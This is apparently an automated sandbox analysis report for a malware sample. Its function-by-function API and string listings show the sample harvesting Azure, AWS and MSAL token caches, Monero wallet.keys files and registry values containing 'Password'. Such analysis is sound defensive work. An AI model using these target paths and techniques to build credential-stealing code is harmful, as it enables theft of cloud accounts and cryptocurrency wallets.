Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
Instruction ID: 3830a8e1482224399f7f252538ea49926ea7e19a147ba09c054ca90ec0da8f5e
Opcode Fuzzy Hash: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
Instruction Fuzzy Hash: D0E122B191010C9BCB18FBA4DC56EFD73B8AF54340F5485A8B60A67095EF746E0ECB92

Function 00BF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00BF4DCD

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943

lstrcat.KERNEL32(?,00000000), ref: 00BF4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00BF4E59

Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92

lstrcat.KERNEL32(?,00000000), ref: 00BF4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BF4EE5

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49B0
Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C008D2), ref: 00BF49C5
Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49E2
Part of subcall function 00BF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BF4A1E
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,0173EB28), ref: 00BF4A4A
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FF8), ref: 00BF4A5C
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A70
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FFC), ref: 00BF4A82
Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A96
Part of subcall function 00BF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BF4AAC
Part of subcall function 00BF4910: DeleteFileA.KERNEL32(?), ref: 00BF4B31

Strings

*.*, xrefs: 00BF4E64
\.azure\, xrefs: 00BF4DC1
Azure\.aws, xrefs: 00BF4E5F
Azure\.azure, xrefs: 00BF4DD3
Azure\.IdentityService, xrefs: 00BF4EEB
*.*, xrefs: 00BF4DD8
\.aws\, xrefs: 00BF4E4D
msal.cache, xrefs: 00BF4EF0
\.IdentityService\, xrefs: 00BF4ED9

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 15da184ead7441fb024e0a7b2c3b7426a730879175678020a65e9199f5e948d3
Instruction ID: 286963855220c3446a0863b25cb7dce5ad52c36bc71d149dc00361815a7e0e60
Opcode Fuzzy Hash: 15da184ead7441fb024e0a7b2c3b7426a730879175678020a65e9199f5e948d3
Instruction Fuzzy Hash: EB4153BAA402086BDB64F760DC47FED7278AB64704F0444A4B689660C1EEB45BCDCB92

Function 00BE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
Part of subcall function 00BE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
Part of subcall function 00BE12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
Part of subcall function 00BE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
Part of subcall function 00BE12A0: RegCloseKey.ADVAPI32(?), ref: 00BE12FF

lstrcat.KERNEL32(?,00000000), ref: 00BE134F
lstrlen.KERNEL32(?), ref: 00BE135C
lstrcat.KERNEL32(?,.keys), ref: 00BE1377

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,0173A670,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BE1465

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

DeleteFileA.KERNEL32(00000000), ref: 00BE14EF

Strings

\Monero\wallet.keys, xrefs: 00BE138D
SOFTWARE\monero-project\monero-core, xrefs: 00BE1335
.keys, xrefs: 00BE136B
wallet_path, xrefs: 00BE1330

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: e6998081a111ee8dcf8fe45df25696cd2e3b3d1bca9c6c45065d49596f2581f5
Instruction ID: cb39f16c1a6103c644e623b4e75a3243ed5c9b6978597625a975283a308f4fff
Opcode Fuzzy Hash: e6998081a111ee8dcf8fe45df25696cd2e3b3d1bca9c6c45065d49596f2581f5
Instruction Fuzzy Hash: 1C510FF195011D5BCB19EB64DD92AFD73BCAB54300F4045E8B70A63092EE706B8DCAA6

Function 00BE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00BE733A
Part of subcall function 00BE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
Part of subcall function 00BE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
Part of subcall function 00BE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
Part of subcall function 00BE72D0: HeapFree.KERNEL32(00000000), ref: 00BE7459

lstrcat.KERNEL32(2FE47020,00C017FC), ref: 00BE7606
lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE7648
lstrcat.KERNEL32(2FE47020, : ), ref: 00BE765A
lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE768F
lstrcat.KERNEL32(2FE47020,00C01804), ref: 00BE76A0
lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE76D3
lstrcat.KERNEL32(2FE47020,00C01808), ref: 00BE76ED
task.LIBCPMTD ref: 00BE76FB

Strings

: , xrefs: 00BE764E

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
Instruction ID: 334011c46763211594bb1554de80464035a3c67b6a313ed78bb47a18de0dc282
Opcode Fuzzy Hash: ab5d7ef0ab6c6f5c6fabff11322bacab5a3859a2aa74027c418c1500478717f9
Instruction Fuzzy Hash: AE313EB5900149DFCB18EBA6DC9ADFE77B4BB48301B184168F106B7291DF34A94BCB52

Function 00BF7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BF7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7603
RtlAllocateHeap.NTDLL(00000000), ref: 00BF760A
wsprintfA.USER32 ref: 00BF7640

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Strings

:, xrefs: 00BF755C
C, xrefs: 00BF754C
\, xrefs: 00BF7560

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
Instruction ID: e76ca349ad980de244a458d865efbb0dfbd3839e69ad0941f9815c52099c8123
Opcode Fuzzy Hash: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
Instruction Fuzzy Hash: F04182B194424CABDF10DB94DC85BEEB7B8EF18700F1400E9F609A7280DB746A48CBA5

Function 00BE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00BE733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BE73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BE740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00BE7452
HeapFree.KERNEL32(00000000), ref: 00BE7459
task.LIBCPMTD ref: 00BE7555

Strings

Password, xrefs: 00BE7401

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
Instruction ID: c641188625804b4899a5e6265f37b2b577805dfe71e485eb8de2daf2eedb542f
Opcode Fuzzy Hash: 25e37e5d6d54ab71947d7c130c267d50e5d21583ed93a09431510bd3b8be4322
Instruction Fuzzy Hash: 8A612AB58442A89BDB24DB51DC45BD9B7F8FF48300F0481E9E649A6281EF705BC9CFA1

Function 00BEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

lstrlen.KERNEL32(00000000), ref: 00BEBC9F

Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 00BEBCCD
lstrlen.KERNEL32(00000000), ref: 00BEBDA5
